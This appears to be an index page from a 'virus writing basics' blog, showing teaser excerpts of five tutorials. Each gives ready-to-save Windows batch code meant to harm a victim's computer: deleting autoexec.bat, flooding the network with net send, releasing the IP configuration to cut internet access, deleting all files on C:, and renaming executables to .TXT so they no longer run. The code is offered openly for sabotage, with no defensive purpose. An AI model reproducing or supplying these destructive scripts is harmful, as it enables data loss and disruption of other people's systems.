virus programs

Messing with files

This is the virus writing basic section. Toady i am going to show how to render a windows useless using dos programing. @echo off attrib -r -s -h FileName del FileName @echo off msg *c:\autoexec.bat is deleted by this. Plz reinstall windows. Now save it as something.bat . Replace...

Flood your network

This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming. The below cade will temporarily flood network once the user turns off his comp everything will be back to normal. :CRASH net send *...

Disable internet temporarily

This is the virus writing basics section. Today we are going to show you how to disable Internet. This is demonstrated using Batch/ Dos Programing. ipconfig /release echo You Internet Been HACKED! Just copy the above code in to a notepad file and save it as anything.BAT. This will...

Delete all files

This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX. DOS programming Paste the given code in notepad @Echo off Del C:\ *.*y And save it like any_name.bat . Now run this...

Change Files extentions

This is the virus writing basics section. Today we are going to show you to disable or corrupt files. This is demonstrated using batch programing/dos programing. In order to corrupt files all that we do is change files to non-working TXT files or some other format. REN *.EXE *.TXT REN *.COM...